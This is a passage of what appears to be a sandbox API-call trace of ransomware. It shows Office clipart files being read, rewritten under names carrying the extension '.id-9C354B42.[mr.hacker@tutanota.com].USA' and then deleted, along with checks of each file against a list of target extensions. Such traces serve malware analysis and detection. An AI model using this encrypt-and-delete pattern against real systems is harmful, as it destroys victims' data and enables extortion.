lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x6bb0, lpOverlapped=0x0) returned 1 [0058.060] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0058.061] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.061] SetEndOfFile (hFile=0x178) returned 1 [0058.061] CloseHandle (hObject=0x178) returned 1 [0058.061] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.061] SetEndOfFile (hFile=0x214) returned 1 [0058.062] CloseHandle (hObject=0x214) returned 1 [0058.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.062] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf")) returned 1 [0058.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0058.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0058.062] lstrlenW (lpString=".doc") returned 4 [0058.062] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.063] lstrlenW (lpString=".docx") returned 5 [0058.063] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.063] lstrlenW (lpString=".pdf") returned 4 [0058.063] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.063] lstrlenW (lpString=".xls") returned 4 [0058.063] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.063] lstrlenW (lpString=".xlsx") returned 5 [0058.063] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.063] lstrlenW (lpString=".ppt") returned 4 [0058.063] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0058.063] lstrlenW (lpString=".zip") returned 4 [0058.063] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.063] lstrlenW (lpString=".rar") returned 4 [0058.063] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.063] lstrlenW (lpString=".bz2") returned 4 [0058.063] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.063] lstrlenW (lpString=".7z") returned 3 [0058.063] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0058.063] lstrlenW (lpString=".dbf") returned 4 [0058.063] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0058.063] lstrlenW (lpString=".1cd") returned 4 [0058.063] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0058.063] lstrlenW (lpString=".jpg") returned 4 [0058.063] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.064] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=11500) returned 1 [0058.064] CloseHandle (hObject=0x214) returned 1 [0058.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf")) returned 0x20 [0058.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0058.064] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.064] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0058.064] GetLastError () returned 0x0 [0058.065] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2cec, lpOverlapped=0x0) returned 1 [0058.066] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2cf0, lpOverlapped=0x0) returned 1 [0058.067] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0058.067] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.067] SetEndOfFile (hFile=0x178) returned 1 [0058.067] CloseHandle (hObject=0x178) returned 1 [0058.067] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.067] SetEndOfFile (hFile=0x214) returned 1 [0058.068] CloseHandle (hObject=0x214) returned 1 [0058.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.069] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf")) returned 1 [0058.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0058.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0058.069] lstrlenW (lpString=".doc") returned 4 [0058.069] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString=".docx") returned 5 [0058.069] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.069] lstrlenW (lpString=".pdf") returned 4 [0058.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString=".xls") returned 4 [0058.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.069] lstrlenW (lpString=".xlsx") returned 5 [0058.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.069] lstrlenW (lpString=".ppt") returned 4 [0058.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0058.069] lstrlenW (lpString=".zip") returned 4 [0058.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.069] lstrlenW (lpString=".rar") returned 4 [0058.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString=".bz2") returned 4 [0058.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString=".7z") returned 3 [0058.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0058.070] lstrlenW (lpString=".dbf") returned 4 [0058.070] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0058.070] lstrlenW (lpString=".1cd") returned 4 [0058.070] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0058.070] lstrlenW (lpString=".jpg") returned 4 [0058.070] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.070] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=4408) returned 1 [0058.071] CloseHandle (hObject=0x214) returned 1 [0058.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf")) returned 0x20 [0058.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0058.071] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.071] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0058.071] GetLastError () returned 0x0 [0058.071] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1138, lpOverlapped=0x0) returned 1 [0058.076] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1140, lpOverlapped=0x0) returned 1 [0058.077] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0058.077] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.077] SetEndOfFile (hFile=0x178) returned 1 [0058.077] CloseHandle (hObject=0x178) returned 1 [0058.077] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.077] SetEndOfFile (hFile=0x214) returned 1 [0058.079] CloseHandle (hObject=0x214) returned 1 [0058.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf")) returned 1 [0058.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0058.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0058.079] lstrlenW (lpString=".doc") returned 4 [0058.079] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.079] lstrlenW (lpString=".docx") returned 5 [0058.079] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.079] lstrlenW (lpString=".pdf") returned 4 [0058.079] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.079] lstrlenW (lpString=".xls") returned 4 [0058.079] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.079] lstrlenW (lpString=".xlsx") returned 5 [0058.079] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.079] lstrlenW (lpString=".ppt") returned 4 [0058.079] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0058.079] lstrlenW (lpString=".zip") returned 4 [0058.079] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.080] lstrlenW (lpString=".rar") returned 4 [0058.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.080] lstrlenW (lpString=".bz2") returned 4 [0058.080] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.080] lstrlenW (lpString=".7z") returned 3 [0058.080] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0058.080] lstrlenW (lpString=".dbf") returned 4 [0058.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0058.080] lstrlenW (lpString=".1cd") returned 4 [0058.080] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0058.080] lstrlenW (lpString=".jpg") returned 4 [0058.080] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.080] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=6256) returned 1 [0058.080] CloseHandle (hObject=0x214) returned 1 [0058.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf")) returned 0x20 [0058.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0058.081] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.081] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0058.081] GetLastError () returned 0x0 [0058.081] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1870, lpOverlapped=0x0) returned 1 [0058.217] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1880, lpOverlapped=0x0) returned 1 [0058.218] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0058.218] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.218] SetEndOfFile (hFile=0x178) returned 1 [0058.764] CloseHandle (hObject=0x178) returned 1 [0058.765] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.765] SetEndOfFile (hFile=0x214) returned 1 [0058.766] CloseHandle (hObject=0x214) returned 1 [0058.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf")) returned 1 [0059.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0059.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0059.904] lstrlenW (lpString=".doc") returned 4 [0059.904] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.904] lstrlenW (lpString=".docx") returned 5 [0059.904] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.904] lstrlenW (lpString=".pdf") returned 4 [0059.904] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.904] lstrlenW (lpString=".xls") returned 4 [0059.904] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.904] lstrlenW (lpString=".xlsx") returned 5 [0059.904] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.904] lstrlenW (lpString=".ppt") returned 4 [0059.904] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0059.904] lstrlenW (lpString=".zip") returned 4 [0059.904] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.904] lstrlenW (lpString=".rar") returned 4 [0059.904] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.904] lstrlenW (lpString=".bz2") returned 4 [0059.904] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.904] lstrlenW (lpString=".7z") returned 3 [0059.904] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0059.904] lstrlenW (lpString=".dbf") returned 4 [0059.904] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0059.904] lstrlenW (lpString=".1cd") returned 4 [0059.904] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0059.904] lstrlenW (lpString=".jpg") returned 4 [0059.904] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.230] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.236] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0060.249] GetLastError () returned 0x0 [0060.250] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x714c, lpOverlapped=0x0) returned 1 [0060.263] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x7150, lpOverlapped=0x0) returned 1 [0060.265] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0060.265] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.265] SetEndOfFile (hFile=0x1c8) returned 1 [0060.265] CloseHandle (hObject=0x1c8) returned 1 [0060.265] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.265] SetEndOfFile (hFile=0x244) returned 1 [0060.266] CloseHandle (hObject=0x244) returned 1 [0060.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.266] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf")) returned 1 [0060.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0060.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0060.267] lstrlenW (lpString=".doc") returned 4 [0060.267] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.267] lstrlenW (lpString=".docx") returned 5 [0060.267] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0060.267] lstrlenW (lpString=".pdf") returned 4 [0060.267] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.267] lstrlenW (lpString=".xls") returned 4 [0060.267] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.267] lstrlenW (lpString=".xlsx") returned 5 [0060.267] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0060.267] lstrlenW (lpString=".ppt") returned 4 [0060.267] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0060.267] lstrlenW (lpString=".zip") returned 4 [0060.267] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.267] lstrlenW (lpString=".rar") returned 4 [0060.267] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.267] lstrlenW (lpString=".bz2") returned 4 [0060.267] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.267] lstrlenW (lpString=".7z") returned 3 [0060.267] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0060.267] lstrlenW (lpString=".dbf") returned 4 [0060.267] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0060.267] lstrlenW (lpString=".1cd") returned 4 [0060.267] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0060.267] lstrlenW (lpString=".jpg") returned 4 [0060.267] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.268] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=3896) returned 1 [0060.268] CloseHandle (hObject=0x244) returned 1 [0060.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf")) returned 0x20 [0060.268] GetFileAttributesW (lpFileName="C:\\Program 